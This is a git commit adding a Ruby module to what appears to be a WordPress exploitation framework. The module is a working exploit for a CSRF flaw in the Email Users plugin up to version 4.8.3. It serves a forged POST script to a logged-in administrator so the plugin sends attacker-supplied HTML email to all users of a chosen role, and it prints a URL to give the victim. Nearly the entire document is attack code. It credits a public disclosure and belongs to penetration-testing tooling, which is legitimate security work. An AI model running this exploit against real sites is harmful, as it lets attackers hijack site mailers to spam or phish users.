Add Email Users <= 4.8.3 CSRF Bulk Mail module

rastating · rastating · commit ecad3c109463 · 2016-09-26T22:43:51.000+01:00
diff --git a/modules/auxiliary/email_users_csrf_bulk_mail.rb b/modules/auxiliary/email_users_csrf_bulk_mail.rb
@@ -0,0 +1,87 @@
+class Wpxf::Auxiliary::EmailUsersCsrfBulkMail < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Email Users <= 4.8.3 CSRF Bulk Mail',
+      desc: 'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\
+            'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
+            'all users of a specified role.',
+      author: [
+        'Julien Rentrop',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8601'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The role of the users to send the e-mail to',
+        default: 'Subscriber',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_body',
+        desc: 'The HTML body of the e-mail to send',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_subject',
+        desc: 'The subject of the e-mail to send',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('email-users', '4.8.4')
+  end
+
+  def user_role
+    "role-#{datastore['user_role'].downcase}"
+  end
+
+  def on_http_request(path, _params, _headers)
+    return '' unless path.eql? normalize_uri(xss_path, initial_req_path)
+    emit_info 'Serving CSRF script to victim...'
+    stop_http_server
+    { type: 'text/html', body: initial_script }
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=mailusers-send-to-group-page')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'send' => 'true',
+      'fromName' => '',
+      'fromAddress' => '',
+      'group_mode' => 'role',
+      'mail_format' => 'html',
+      'send_targets[]' => user_role,
+      'subject' => datastore['email_subject'],
+      'mailcontent' => datastore['email_body']
+    )
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Provide the URL below to the victim to send the bulk e-mail'
+    puts
+    puts url_with_xss
+    puts
+
+    start_http_server
+    true
+  end
+end
